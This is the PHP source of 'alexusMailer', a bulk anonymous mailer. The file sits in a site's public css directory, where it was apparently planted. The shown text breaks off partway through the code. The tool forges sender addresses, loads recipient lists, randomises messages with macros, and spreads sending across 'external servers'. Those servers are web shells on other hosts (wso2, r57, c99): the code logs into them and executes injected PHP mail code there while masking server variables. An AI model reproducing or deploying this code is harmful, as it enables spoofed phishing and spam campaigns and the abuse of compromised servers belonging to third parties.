File: /home/emerlux/public_html/css/alexus1.php
<?php $logpass=""; //FORMAT: md5(loginIMAILpassword); ?>
<?php
ini_set('display_errors',0);//1
ini_set('display_startup_errors',0);//1
error_reporting(0);//-1
?>
<?php header('Content-type: text/html; charset=utf-8;'); ?>
<?php
#Alexus(240980845) - http://www.a-l-e-x-u-s.ru/
#CREATED AT 15.12.2011
#UPD 02.04.2012 v 1.1
#UPD 10.04.2012 v 1.2
#UPD 30.05.2012 v 1.3
#UPD 02.06.2012 v 1.3.1
#UPD 20.10.2012 v 1.4
#UPD 16.02.2013 v 1.5
#UPD 15.04.2013 v 1.5.1
#UPD 01.06.2013 v 1.6
#UPD 15.09.2013 v 1.6.5
#UOD 30.04.2014 v 1.7
#UPD 11.08.2014 v 1.7.1
#UPD 02.10.2014 v 1.7.2
define("VERSION", "1.7");
$boundary="--".randomstr(10);
$lang="ru";
if (isset($_COOKIE['translation']))
$lang=$_COOKIE['translation'];
if(isset($_POST['PROXY'])) {
$proxy_server=parse_url($_POST['PROXY']);
define("PROXY",$proxy_server['host'].":".$proxy_server['port']);
}
$translation=array(
'ru'=>array(
'status-idle'=>'простаиваем',
'status-sending'=>'рассылка',
'status-pause'=>'пауза',
'process-resume'=>'Возобновить',
'process-pause'=>'Приостановить',
'process-cancel'=>'Отменить',
'settings-primary'=>'Основные',
'settings-outservers'=>'Внешние сервера',
'settings-security'=>'Безопасность',
'settings-history-length'=>'Длина истории отправки',
'settings-outservers-doc'=>'Подробное описание работы с внешнеми серверами смотрите в <a href="http://mailer.a-l-e-x-u-s.ru/docs/alexusMailer_v1.7.ru.pdf"><span class="label label-warning">документации</span></a>',
'settings-outservers-check'=>'<button class="btn" onclick="pingoutservers()">Проверить сервера</button> (недоступные будут автоматически удалены из списка)',
'settings-outservers-check-log'=>'Лог проверки:',
'settings-security-notwritable'=>' Отсутствует доступ на запись к скрипту! Смена пароля невозможна. <b>Измените права на 666</b> на время смены пароля.',
'settings-security-password-changed'=>'Пароль успешно изменен!',
'settings-security-password-not-changed'=>'При изменении пароля произошла ошибка, возможно файл скрипта недоступен на запись.',
'settings-security-set-password'=>'Установить пароль',
'settings-security-remove-password'=>'Удалить пароль',
'settings-security-use-proxy'=>'Использовать http прокси',
'main'=>'Главная',
'help'=>'Помощь',
'login'=>'Логин',
'password'=>'Пароль',
'settings'=>'Настройки',
'name'=>'йаПосылалка',
'title_service'=>'Сервис анонимной отправки почты с подменой адреса',
'description_service'=>'Сервис анонимной отправки электронной почты с подменой адреса и прикреплением файлов йаПосылалка',
'keywords_service'=>'Сервис анонимной отправки почты,анонимная отправка почты, анонимная отправка электронных сообшений, анонимная отправка сообшений, анонимное письмо, анонимный e mail ,отправить анонимный e mail,анонимная отправка e mail',
'need_auth'=>'Для доступа необходима авторизация.',
'wronglogpas'=>'Неправильный логин или пароль.',
'sendedto'=>'Отправлено на ',
'badcaptcha'=>'Неправильная captcha',
'sendlimit'=>'Лимит отправок 1 в час',
'sendavailable'=>'Отправка доступна',
'sendlessminute'=>'Отправка менее чем через минуту',
'sendafter'=>'Отправка через ',
'sendafter2'=>' минут',
'attachfile'=>'Прикрепление файла',
'close'=>'Закрыть',
'upload'=>'Загрузить',
'uploadlist'=>'Загрузка списка',
'uploadtemplate'=>'Загрузка шаблона',
'preview'=>'Предпросмотр',
'donatedevelopment'=>'Спонсировать разработку',
'techsupport'=>'Техническая поддержка',
'settings'=>'Настройки',
'threadsnum'=>'Количество потоков:',
'timeoutlen'=>'Длительность задржки в секундах:',
'useoutservers'=>'Использовать внешние серверы для отправки',
'unavalable_in_service'=>'недоступно в режиме сервиса',
'less'=>'Меньше',
'more'=>'Больше',
'delete'=>'Удалить',
'status'=>'Статус',
'recipient'=>'Кому',
'fromname'=>'От кого, имя',
'frommail'=>'От кого, адрес email',
'replymail'=>'Адрес ответа, email',
'subject'=>'Тема',
'subject_example'=>'выращивание бамбука под кроватью',
'addfield'=>'Дополнительное поле',
'addfield2'=>'доп. поле',
'mailtype'=>'Тип письма',
'plaintext'=>'обычный текст',
'withformating'=>'с форматированием',
'htmle'=>'html с переносом картинок в аттач',
'captcha'=>'Проверочный код',
'save'=>'Сохранить',
'load'=>'Загрузить',
'send'=>'Отправить',
'backtoeditor'=>'Вернуться к редактированию',
'hellopage'=>'<center><h2>Сервис йаПосылалка</h2></center>
<p>
Сервис йаПосылалка создан на базе одноименного скрипта анонимной отправки электронной почты.
Для сервиса всегда используется последняя версия скрипта, но при этом сервис имеет некоторые ограничения
для защиты его от использования в качестве спамера.
<br><b>Ограничения:</b><br>
<ol>
<li>Разрешено отправлять одно письмо в час</li>
<li>Для отправки необходимо вводить капчу</li>
<li>Отображается реклама</li>
</ol>
<b>Сервис анонимной отправки почты абсолютно бесплатен</b> и существует в первую очедь в демонстрационных целях.<br>
<center><button class="btn btn-primary btn-large prime-button">Отправить письмо</button></center>
</p>
<p>
Последнюю версию скрипта анонимной отправки для установки на своём сервере можно <b>купить за 25$ или 750 рублей</b>.
<br>В ней <b>отсутствуют все ограничения</b> на отправку, и обеспечиваются:<br>
<ol>
<li>Помощь по использованию и установке</li>
<li>Исправление найденых ошибок</li>
<li>Приоритетный приём заявок по доработке</li>
<li>Обновления в пределах текущей ветки</li>
</ol>
<center><a href="/buy/" class="btn btn-primary btn-large prime-button" style="color:#fff;font-weight:bold;">Купить</a></center>
</p>
<p>
У йаПосылалка существует <b>высокодоходная партнёрская программа</b>, если человек купит скрипт по вашей партнёрской ссылке,
вы получаете <b>50% от стоимости</b> скрипта (12.5$ или 325 рублей) с каждой продажи.<br>
<center><a href="/partner/" class="btn btn-primary btn-large prime-button" style="color:#fff;font-weight:bold;">Стать партнёром!</a></center>
</p>
<script type="text/javascript">(function() {
if (window.pluso)if (typeof window.pluso.start == "function") return;
var d = document, s = d.createElement(\'script\'), g = \'getElementsByTagName\';
s.type = \'text/javascript\'; s.charset=\'UTF-8\'; s.async = true;
s.src = (\'https:\' == window.location.protocol ? \'https\' : \'http\') + \'://share.pluso.ru/pluso-like.js\';
var h=d[g](\'head\')[0] || d[g](\'body\')[0];
h.appendChild(s);
})();</script>
<div data-description="Сервис анонимной отправки электронной почты с подменой адреса и прикреплением файлов йаПосылалка" data-title="Сервис анонимной отправки почты с подменой адреса - йаПосылалка" data-url="http://mailer.a-l-e-x-u-s.ru/" class="pluso" data-options="big,square,line,horizontal,counter,theme=08" data-services="vkontakte,odnoklassniki,facebook,twitter,google,moimir,email,print" data-background="#ebebeb"></div>
<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "660", attach: false, norealtime:1}, "mailer.a-l-e-x-u-s.ru");
</script>',
'helppage'=>'<h2>Справка</h2>
<h3>Что это?</h3>
Сервис анонимной отправки email сообщений с произвольного/чужого адреса в текстовом или html формате.<br>
<b>Формат html(e)</b> позволяет автоматически перенести в attach картинки из тегов img или атрибута background, что делает письмо автономным и не требует внешнего сервера для корректного отображения.
Так же в почтовых клиентах (the bat, outlook, ...) картинки отображаются сразу.<br>
<b>esreveR</b> меняет символы в обратном порядке и устанавливает css для их отображения в верном порядке.<br>
<b>Предпросмотр</b> позволяет посмотреть как будет выглядеть письмо когда все макросы будут заменены.<br>
<b>Сохранение\Загрука</b> позволяет экономить время и делать шаблоны для часто используемых писем.<br>
<b>Подгрузка списка</b> адресатов возможна нажатием на кнопку рядом с соотв. полем.<br>
<b>Задержка</b> между отправкой писем<br>
<b>Внешние серверы</b> для распределения рассылки между разными йаПосылалками <br><b style="color:red;">Перед использованием внешних посылалок проверьте корректность их работы на сервере</b>
<br><br><a href="http://mailer.a-l-e-x-u-s.ru/docs/alexusMailer_v1.7.ru.pdf"><span class="label label-warning"><i class="icon-file icon-white"></i> Скачать полную документацию</span></a>
<hr>
<h3>Макросы (в теле письма и в заголовках)</h3>
<ul>
<li>Кому - <b>[TO-EMAIL]</b></li>
<li>От кого, имя - <b>[FROM-NAME]</b></li>
<li>От кого, адрес email - <b>[FROM-EMAIL]</b></li>
<li>Тема - <b>[THEME]</b></li>
<li>Дополнительное поле - <b>[ADD0]</b> , <b>[ADD1]</b>, <b>[ADD2]</b> ...</li>
<li>Случайное число (5000..6000)- <b>[RAND]</b></li>
<li>Случайное число (от A до B)- <b>[RAND-A-B]</b> , например <b>[RAND-10-99]</b></li>
<li>Случайный текст - <b>[RAND:text1|text2|...]</b> , например <b>[RAND:hello dude|hello|hi|wazzup]</b></li>
<li>Перечисление - <b>[ENUM:text1|text2|...]</b> , например <b>[ENUM:здравствуйте|привет|как дела]</b></li>
</ul>
<h3>Макросы даты и времени</h3>
<ul>
<li><b>[DATE]</b> - Текущая дата (<b>[DATE-4]</b> - Текущая дата минус 4 дня) (<b>[DATE+4]</b> - Текущая дата плюс 4 дня)
<ul>
<li><b>[DAY]</b> - Текущий день (<b>[DAY+3]</b> - Текущий день плюс 3 дня)</li>
<li><b>[MONTH]</b> - Текущий месяц (<b>[MONTH-2]</b> - Текущий месяц минус 2 месяца)</li>
<li><b>[YEAR]</b> - Текущий год (<b>[YEAR-1]</b> - Текущий год минус 1 год)</li>
</ul>
</li>
<li><b>[TIME]</b> - Текущее время (<b>[TIME-4]</b> - Текущее время минус 4 минуты)
<ul>
<li><b>[HOUR]</b> - Текущий час (<b>[HOUR-3]</b> - Текущий час минус 3 часа)</li>
<li><b>[MINUTE]</b> - Текущий месяц (<b>[MINUTE-2]</b> - Текущая минута минус 2 минуты)</li>
</ul>
</li>
</ul>
<hr>
Внимание! Сервис предоставлен исключительно для ознакомления. Ответственность за возможно незаконное использование несете только Вы.'
),
'en'=>array(
'status-idle'=>'Idle',
'status-sending'=>'Sending',
'status-pause'=>'Pause',
'process-resume'=>'Resume',
'process-pause'=>'Pause',
'process-cancel'=>'Cancel',
'settings-primary'=>'Primary',
'settings-outservers'=>'External servers',
'settings-security'=>'Security',
'settings-history-length'=>'History max length',
'settings-outservers-doc'=>'Read <a href="http://mailer.a-l-e-x-u-s.ru/docs/alexusMailer_v1.7.en.pdf"><span class="label label-warning">documentation</span></a> to learn more about external servers.',
'settings-outservers-check'=>'<button class="btn" onclick="pingoutservers()">Check servers</button> (Unavailable will be auto-removed)',
'settings-outservers-check-log'=>'Check log:',
'settings-security-notwritable'=>'Script file is not writable! Password change imposible. <b>Change file rights to 666</b> for password change.',
'settings-security-password-changed'=>'Password succesfully changed!',
'settings-security-password-not-changed'=>'There was an error during pass change, may be script file is not writable.',
'settings-security-set-password'=>'Set password',
'settings-security-remove-password'=>'Remove password',
'settings-security-use-proxy'=>'Use http proxy',
'main'=>'Primary',
'help'=>'Help',
'login'=>'Login',
'password'=>'Password',
'settings'=>'Settings',
'backtoeditor'=>'Back to editor',
'name'=>'alexusMailer',
'title_service'=>'Anonymous e-mail service',
'description_service'=>'Сервис анонимной отправки электронной почты с подменой адреса и прикреплением файлов йаПосылалка',
'keywords_service'=>'Сервис анонимной отправки почты,анонимная отправка почты, анонимная отправка электронных сообшений, анонимная отправка сообшений, анонимное письмо, анонимный e mail ,отправить анонимный e mail,анонимная отправка e mail',
'need_auth'=>'Authentification required!',
'wronglogpas'=>'Wrong login or password!',
'sendedto'=>'Sended to ',
'badcaptcha'=>'Wrong security code',
'sendlimit'=>'Sending limit is 1 per hour',
'sendavailable'=>'Sending available',
'sendlessminute'=>'Sending will be available less in one minute',
'sendafter'=>'Sending after ',
'sendafter2'=>' minutes',
'attachfile'=>'Attach file',
'close'=>'Close',
'upload'=>'Upload',
'uploadlist'=>'Upload list',
'uploadtemplate'=>'Upload template',
'preview'=>'Preview',
'donatedevelopment'=>'Donate to developer',
'techsupport'=>'Tech Support',
'settings'=>'Settings',
'threadsnum'=>'Thread nubmer:',
'timeoutlen'=>'Timeout in seconds:',
'useoutservers'=>'Use external servers for sending',
'unavalable_in_service'=>'unavailable in service mode',
'less'=>'Less',
'more'=>'More',
'delete'=>'Delete',
'status'=>'Status',
'recipient'=>'Recipient',
'fromname'=>'From, name',
'frommail'=>'From, email',
'replymail'=>'Reply-to, email',
'subject'=>'Subject',
'subject_example'=>'Growing bamboo under the bed',
'addfield'=>'Additional field',
'addfield2'=>'add. field',
'mailtype'=>'Mail type',
'plaintext'=>'plain text',
'withformating'=>'with formating',
'htmle'=>'html with image auto-attach',
'captcha'=>'Security code',
'save'=>'Save',
'load'=>'Load',
'send'=>'Send',
'hellopage'=>'<center><h2>alexusMailer service</h2></center>
<p>
alexusMailer service is based on the eponymous script to send an anonymous e-mail.
For this service is always used the latest version of the alexusMailer, but it have some limitations to protect it from being used as a spammer.
<br><b>Limitations:</b><br>
<ol>
<li>Allowed to send one letter per hour</li>
<li>To send you must enter the captcha</li>
<li>Advertisement</li>
</ol>
<b>Anonymous mailing service is completely free</b> and exists in demonstration purposes.<br>
<center><button class="btn btn-primary btn-large prime-button">Send mail</button></center>
</p>
<p>
You can by the latest version of alexusMailer - anonymous mailing script for installing on your own server <b>for 25 USD</b>.
<br>This version <b>have no any limitations</b> and gives you:<br>
<ol>
<li>Full support in installation and using</li>
<li>Fixing of all errors you can find</li>
<li>Priority accepting applications for upgrading</li>
<li>Free updates in current major version (1.*)</li>
</ol>
<center><a href="/en/buy/" class="btn btn-primary btn-large prime-button" style="color:#fff;font-weight:bold;">Buy alexusMailer</a></center>
</p>
<p>
alexusMailer has a <b>highly profitable partnership program</b>, if a person buys alexusMailer on your affiliate link
you get <b>50% of the cost</b> (12.5 USD) per sale.<br>
<center><a href="/en/partner/" class="btn btn-primary btn-large prime-button" style="color:#fff;font-weight:bold;">Became a partner!</a></center>
</p>
<script type="text/javascript">(function() {
if (window.pluso)if (typeof window.pluso.start == "function") return;
var d = document, s = d.createElement(\'script\'), g = \'getElementsByTagName\';
s.type = \'text/javascript\'; s.charset=\'UTF-8\'; s.async = true;
s.src = (\'https:\' == window.location.protocol ? \'https\' : \'http\') + \'://share.pluso.ru/pluso-like.js\';
var h=d[g](\'head\')[0] || d[g](\'body\')[0];
h.appendChild(s);
})();</script>
<div data-description="Anonymous e-mail service with attaching files - alexusMailer" data-title="Anonymous remailer - alexusMailer" data-url="http://mailer.a-l-e-x-u-s.ru/en/" class="pluso" data-options="big,square,line,horizontal,counter,theme=08" data-services="vkontakte,odnoklassniki,facebook,twitter,google,moimir,email,print" data-background="#ebebeb"></div>
',
'helppage'=>'<h2>Help</h2>
<h3>What is it?</h3>
Anonymous mailing service from random or foreign email in plain text or html format.<br>
<b>Format html(e)</b> allows automatically move images from img tag or background attribute to attach, what makes letter independent from external server for correct display.
Also in e-mail clients (the bat, outlook, ...) will be displayed immediately.<br>
<b>esreveR</b> change symbol possition in back order and set css for correct display in mail.<br>
<b>Preview</b> can hepl to see how mail will look after all macro will be replaced.<br>
<b>Save\Load</b> is helpful in making collection of regular mailing templates.<br>
<b>Recipient list loading</b> available by clicking on button near the recipient field.<br>
<b>Timeout</b> between sending mails.<br>
<b>External servers</b> for distributing you mails between different servers <br><b style="color:red;">Before using external servers ensure that they work correct.</b>
<br><br><a href="http://mailer.a-l-e-x-u-s.ru/docs/alexusMailer_v1.7.en.pdf"><span class="label label-warning"><i class="icon-file icon-white"></i> Download full documentation</span></a>
<hr>
<h3>Macro (in mail body, headers and additional fields)</h3>
<ul>
<li>Recipient - <b>[TO-EMAIL]</b></li>
<li>From, name - <b>[FROM-NAME]</b></li>
<li>From, email - <b>[FROM-EMAIL]</b></li>
<li>Subject - <b>[THEME]</b></li>
<li>Additional field - <b>[ADD0]</b> , <b>[ADD1]</b>, <b>[ADD2]</b> ...</li>
<li>Random number (5000..6000)- <b>[RAND]</b></li>
<li>Random number (from A to B)- <b>[RAND-A-B]</b> , example <b>[RAND-10-99]</b></li>
<li>Random text - <b>[RAND:text1|text2|...]</b> , example <b>[RAND:hello dude|hello|hi|wazzup]</b></li>
<li>Enumeration - <b>[ENUM:text1|text2|...]</b> , example <b>[ENUM:wellcome|hi|how are you]</b></li>
</ul>
<h3>Macro for date and time</h3>
<ul>
<li><b>[DATE]</b> - Current date (<b>[DATE-4]</b> - Current date minus 4 days) (<b>[DATE+4]</b> - Current date plus 4 days)
<ul>
<li><b>[DAY]</b> - Current day (<b>[DAY+3]</b> - Current day plus 3 days)</li>
<li><b>[MONTH]</b> - Current month (<b>[MONTH-2]</b> - Current month minus 2 months)</li>
<li><b>[YEAR]</b> - Current year (<b>[YEAR-1]</b> - Current year minus 1 year)</li>
</ul>
</li>
<li><b>[TIME]</b> - Current time (<b>[TIME-4]</b> - Current time minus 4 minutes)
<ul>
<li><b>[HOUR]</b> - Current hour (<b>[HOUR-3]</b> - Current hour minus 3 hours)</li>
<li><b>[MINUTE]</b> - Current minute (<b>[MINUTE-2]</b> - Current minute minus 2 minutes)</li>
</ul>
</li>
</ul>
<hr>
Warning! This service was created only in demonstration purposes. All responsibility for out law actions is only on you!'
)
);
function tr($name, $iface=true) {
global $lang, $translation;
if($iface)
print "<span class='tr-$name'>".$translation[$lang][$name]."</span>";
else
print $translation[$lang][$name];
return;
}
if($logpass!="") {
if(!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="IMAIL"');
header('HTTP/1.0 401 Unauthorized');
print tr('need_auth',false);
exit;
} else {
if(md5($_SERVER['PHP_AUTH_USER']."IMAIL".$_SERVER['PHP_AUTH_PW'])!=$logpass) {
header('WWW-Authenticate: Basic realm="IMAIL"');
header('HTTP/1.0 401 Unauthorized');
print tr('wronglogpas',false);
exit;
}
}
}
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
if($_SERVER['QUERY_STRING']=="send" || $_SERVER['QUERY_STRING']=="preview") {
$email=array(
to=> $_POST['to'],
fromname=> $_POST['fromname'],
frommail=> $_POST['frommail'],
replymail=> $_POST['replymail'],
tema=> $_POST['tema'],
additional=>$_POST['additional'],
text=> $_POST['text'],
enumer=> $_SERVER['QUERY_STRING']=="preview"?1:$_POST['enumer']
);
//замена списочных значений
$email[fromname]=applyEnumer($email[fromname], $email[enumer]);
$email[frommail]=applyEnumer($email[frommail], $email[enumer]);
$email[replymail]=applyEnumer($email[replymail], $email[enumer]);
$email[tema]=applyEnumer($email[tema], $email[enumer]);
ReplaceFileTemplate($email[to], $email);
if($_POST['type']=='text')
$tip="text/plain";
else
$tip="text/html";
ReplaceTemplates($email[text], $email);
ReplaceTemplates($email[fromname], $email);
ReplaceTemplates($email[frommail], $email);
ReplaceTemplates($email[tema], $email);
foreach ($email[additional] as $key => $value)
ReplaceTemplates($email[additional][$key], $email);
$fromname=trim($email[fromname]); $fromname=substr($fromname,0,100);
$frommail=trim($email[frommail]); $frommail=substr($frommail,0,100);
$from="=?UTF-8?B?".base64_encode($fromname)."?= <$frommail>";
$tema=$email[tema];
$header="From: $from\n";
//$header.="Subject: $tema\n";
$header.="Content-type: $tip; charset=utf-8\n";
if(trim($email[replymail])!='')
$header.="Reply-To: {$email[replymail]}\n";
if($_SERVER['QUERY_STRING']=="preview") {
print $email[text];
exit;
}
if($_POST['type']=='htmle' || isset($_POST['files'])) {
$header="From: $from\n";
//$header.="Subject: $tema\n";
$header.="MIME-Version: 1.0;\n";
$header.="Content-type: multipart/mixed; boundary=\"$boundary\"\n";
if(trim($email[replymail])!='')
$header.="Reply-To: {$email[replymail]}\n";
$content="--$boundary\n";
$content.="Content-type: text/html; charset=\"utf-8\"\n";
$content.="Content-Transfer-Encoding: 8bit\n\n";
}
if($_POST['type']=='htmle') {
preg_match_all('~<img.*?src=\"(.+?)\".*?>~si',$email[text],$matches);
preg_match_all('~background="(.+?)"~si',$email[text],$matches2);
$img_matches=array_merge($matches[1],$matches2[1]);
$i = 0;
$paths = array();
foreach ($img_matches as $img) {
if($paths[$i-1]['path']==$img) continue;
$paths[$i]['path']=$img;
if(preg_match("/\.gif/i", $img)) {
$paths[$i]['type']='gif';
} else if(preg_match("/\.png/i", $img)) {
$paths[$i]['type']='png';
} else if(preg_match("/\.(jpeg|jpg)/i", $img)) {
$paths[$i]['type']='jpeg';
} else {
$paths[$i]['type']='unknown';
}
$paths[$i]['cid']=md5($img);
$email[text] = str_replace($img,'cid:'.$paths[$i]['cid'],$email[text]);
$i++;
}
$content.=$email[text]."\n";
if(isset($_POST['files'])) $content.=makeAttach(json_decode($_POST['files'], true), $boundary);
foreach($paths as $img) {
$content.="--$boundary\n";
if($img['type']=="unknown")
$content.="Content-Type: application/octet-stream; name=\"".$img['cid'].".png\"\n";
else
$content.="Content-Type: image/".$img['type']."; name=\"".$img['cid'].".".$img['type']."\"\n";
$content.="Content-Transfer-Encoding:base64\n";
$content.="Content-ID: <".$img['cid'].">\n\n";
$content.=chunk_split(base64_encode(file_get_contents($img['path'])))."\n";
}
$content.="--$boundary--\n";
} elseif(isset($_POST['files'])) {
$content.=$email[text]."\n";
$content.=makeAttach(json_decode($_POST['files'], true), $boundary);
$content.="--$boundary--\n";
} else {
$content=$email['text'];
}
/**
Зона дебага
Симулируем отправку(медленно и четко)
*/
/*sleep(1);
echo tr('sendedto',false).$email[to];
exit;*/
/**
Зона дебага
*/
if($_SERVER['QUERY_STRING']=="send" && isset($_POST['outserver'])) {
$data=json_encode(array(
'to'=>$email[to],
'subject'=>$tema,
'content'=>base64_encode($content),
'header'=>$header
)
);
$code="\$hide=array('PHP_SELF'=>'','SCRIPT_FILENAME'=>'','REQUEST_URI'=>'','SCRIPT_NAME'=>'');while(list(\$key,)=each(\$hide)){\$hide[\$key]=\$_SERVER[\$key];\$_SERVER[\$key]='/';}\$data=json_decode('{$data}',true);mail(\$data['to'],\$data['subject'],base64_decode(\$data['content']),\$data['header']);reset(\$hide);while(list(\$key,)=each(\$hide))\$_SERVER[\$key]=\$hide[\$key];print 'sended';";
$outserver=$_POST['outserver'];
list($url,$type,$pass)=explode("|",$outserver);
if($type=="wso2") {
$answer=wso2exec($url,$pass,$code);
print $answer=="sended"?tr('sendedto',false).$email[to]:"remote server unavailable".$answer;
exit;
} elseif($type=="r57") {
list($login,$pass)=explode(":", $pass);
$answer=r572exec($url,$login,$pass,$code);
print $answer=="sended"?tr('sendedto',false).$email[to]:"remote server unavailable".$answer;
exit;
} elseif($type=="c99") {
list($login,$pass)=explode(":", $pass);
$answer=c992exec($url,$login,$pass,$code);
print $answer=="sended"?tr('sendedto',false).$email[to]:"remote server unavailable".$answer;
exit;
} elseif($type=="ars") {
//list($login,$pass)=explode(":", $pass);
$answer=ars2exec($url,$pass,"mail",$data);
print $answer['status']=="GOOD"?tr('sendedto',false).$email[to]:"remote server unavailable".$answer;
exit;
} else {
print "WRONG OUT SERVER TYPE";
exit;
}
} else {
//print $content;
//print $header;
if(function_exists("mb_orig_mail"))
mb_orig_mail($email[to], $tema, $content, $header);
else
mail($email[to], $tema, $content, $header);
}
echo tr('sendedto',false).$email[to];
exit;
} elseif ($_SERVER['QUERY_STRING']=="send_from_template") {
$template=str_replace("&", "&", $_POST['template']);
list($template,$text)=explode("[TEXT]", $template);
$content=explode("\n", $template);
$post=array();
$post['to']=$_POST['to'];
$post['replymail']=$_POST['replymail'];
$post['text']=$text;
for($i=0; $i<count($content);$i++) {
if(strpos($content[$i], "[FROM-NAME]")!==false) {
$content[$i]=str_replace("[FROM-NAME]","",$content[$i]);
$post['fromname']=$content[$i];
} elseif(strpos($content[$i], "[FROM-EMAIL]")!==false) {
$content[$i]=str_replace("[FROM-EMAIL]","",$content[$i]);
$post['frommail']=$content[$i];
} elseif(strpos($content[$i], "[THEME]")!==false) {
$content[$i]=str_replace("[THEME]","",$content[$i]);
$post['tema']=$content[$i];
} elseif(strpos($content[$i], "[TYPE]")!==false) {
$content[$i]=str_replace("[TYPE]","",$content[$i]);
$post['type']=$content[$i];
} elseif(strpos($content[$i], "[FILES]")!==false) {
$content[$i]=str_replace("[FILES]","",$content[$i]);
$post['files']=$content[$i];
} elseif(strpos($content[$i], "[ADD")!==false) {
$result=preg_match("/\[ADD(\d+)\]/", $content[$i], $arr);
$post['additional['.$arr[1].']']=str_replace($arr[0], "", $content[$i]);
}
}
//print_r($post);
$requrl='http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?send';
//print $requrl.PHP_EOL;
$headers=array();
$headers[]='Content-type: application/x-www-form-urlencoded';
$opts = array('http' =>
array(
'method' => 'POST',
//'proxy' => (defined('PROXY'))?('tcp://' . PROXY):null,
'header' => implode(PHP_EOL, $headers),
//'timeout' => $timeout,
'content' => http_build_query($post)
)
);
//print_r($opts);
$context = stream_context_create($opts);
$response=@file_get_contents($requrl, false, $context);
print $response;
exit;
} elseif ($_SERVER['QUERY_STRING']=="upload_form") {
print "<form action='".$_SERVER['PHP_SELF']."?upload' method='post' enctype='multipart/form-data'><input type='file' name='elist'>";
exit;
} elseif ($_SERVER['QUERY_STRING']=="upload") {
if ($_FILES["elist"]["error"] > 0) {
echo "Error: " . $_FILES["elist"]["error"] . "<br />";
} else {
print "<html><body onload='window.parent.upload_finished(document.body.textContent||document.body.innerText)'>".file_get_contents($_FILES["elist"]["tmp_name"])."</body></html>";
}
exit;
} elseif ($_SERVER['QUERY_STRING']=="upload_universal") {
if(!isset($_POST['sended'])) {
print "<form action='".$_SERVER['PHP_SELF']."?upload_universal' method='post' enctype='multipart/form-data'><input type='hidden' name='sended' value='true'><input type='file' name='elist'>";
exit;
} else {
if ($_FILES["elist"]["error"] > 0) {
echo "Error: " . $_FILES["elist"]["error"] . "<br />";
} else {
print "<html>
<body onload='window.parent.uploadFinishedHandler(document.body.textContent||document.body.innerText)'>".
base64_encode(json_encode(array(
"name" => $_FILES["elist"]["name"],
"type" => $_FILES["elist"]["type"],
"size" => $_FILES["elist"]["size"],
"content" => base64_encode(file_get_contents($_FILES["elist"]["tmp_name"]))
))).
"</body></html>";
}
exit;
}
if ($_FILES["elist"]["error"] > 0) {
echo "Error: " . $_FILES["elist"]["error"] . "<br />";
} else {
print "<html><body onload='window.parent.upload_finished(document.body.textContent||document.body.innerText)'>".file_get_contents($_FILES["elist"]["tmp_name"])."</body></html>";
}
exit;
} elseif ($_SERVER['QUERY_STRING']=="loadsave") {
if(isset($_FILES["elist"])) {
print "<html><body onload='window.parent.loadsave(document.body.innerHTML)'>".file_get_contents($_FILES["elist"]["tmp_name"])."</body></html>";
} else {
print "<form action='".$_SERVER['PHP_SELF']."?loadsave' method='post' enctype='multipart/form-data'><input type='file' name='elist'></form>";
}
exit;
} elseif ($_SERVER['QUERY_STRING']=="savedata") {
if(isset($_POST['savedata'])) {
header ("Content-Type: application/force-download");
header ("Accept-Ranges: bytes");
header ("Content-Length: ".strlen(($_POST['savedata'])));
header ("Content-Disposition: attachment; filename=template.txt");
print $_POST['savedata'];
} else {
print "<form action='".$_SERVER['PHP_SELF']."?savedata' method='post'><textarea name='savedata'></textarea>
<input type='submit' value='Upload'></form>";
}
exit;
} elseif ($_SERVER['QUERY_STRING']=="changepass") {
clearstatcache();
$response=array();
if(!is_writable(__FILE__)) {
$response['result']="error";
} elseif($_POST['login']=="" && $_POST['pass']=="") {
$data=file_get_contents(__FILE__);
$data=str_replace($logpass, "", $data);
file_put_contents(__FILE__, $data);
$response['result']="ok";
} else {
$new_logpass=md5($_POST['login']."IMAIL".$_POST['pass']);
$data=file_get_contents(__FILE__);
if($logpass=="") {
$data=str_replace('$logpass="";', '$logpass="'.$new_logpass.'";', $data);
} else {
$data=str_replace($logpass, $new_logpass, $data);
}
//$data=preg_replace("/$logpass=\".*?\";/", "$logpass=\"".$new_logpass."\";", $data, 1);
file_put_contents(__FILE__, $data);
$response['result']="ok";
}
//print $new_logpass.PHP_EOL;
//print $data;
print json_encode($response);
exit;
} elseif ($_SERVER['QUERY_STRING']=="diagnostics") {
clearstatcache();
$state=array(
'self_permissions'=>(int)is_writable(__FILE__),
'dir_permissions' =>(int)is_writable("."),
'mail_function' =>(int)function_exists("mail"),
'fgc_function' =>(int)function_exists("file_get_contents")
);
if(isset($_POST['API'])) {
print json_encode($state);
exit;
}
print "<h1>diagnostics</h1>";
print "<pre>";
print_r($state);
print "</pre>";
exit;
} elseif ($_SERVER['QUERY_STRING']=="pingoutserver") {
$testcode="echo 'test';";
$outserver=$_POST['server'];
/*$list=explode(PHP_EOL, $_POST['servers']);
$newlist=array();*/
//foreach ($list as $outserver) {
list($url,$type,$pass)=explode("|",$outserver);
//сначала проверим что не 404
$headers = get_headers($url, 1);
if($headers[0]=="HTTP/1.1 404 Not Found") {
print json_encode(array(
"status"=>"BAD",
"server"=>$outserver,
"error"=>"404 not found"
));
exit;
}
//иначе проводим тест авторизации и выполнения кода
$result=false;
if($type=="wso2") {
$answer=wso2exec($url,$pass,$testcode);
if($answer=='test')
$result=true;
} elseif($type=="r57") {
list($login,$pass)=explode(":", $pass);
$answer=r572exec($url,$login,$pass,$testcode);
if($answer=='test')
$result=true;
} elseif($type=="c99") {
list($login,$pass)=explode(":", $pass);
$answer=c992exec($url,$login,$pass,$testcode);
if($answer=='test')
$result=true;
} elseif($type=="ars") {
//list($login,$pass)=explode(":", $pass);
$answer=ars2exec($url,$pass,"test");
if($answer=='test')
$result=true;
}
//}
if($result)
print json_encode(array(
"status"=>"GOOD",
"server"=>$outserver
));
else
print json_encode(array(
"status"=>"BAD",
"server"=>$outserver,
"error"=>"test command execution failed"
));
exit;
} elseif ($_SERVER['QUERY_STRING']=="linesinfile") {
$file_path=$_POST['file_path'];
if(!file_exists($file_path) || !is_readable($file_path))
print "0";
else {
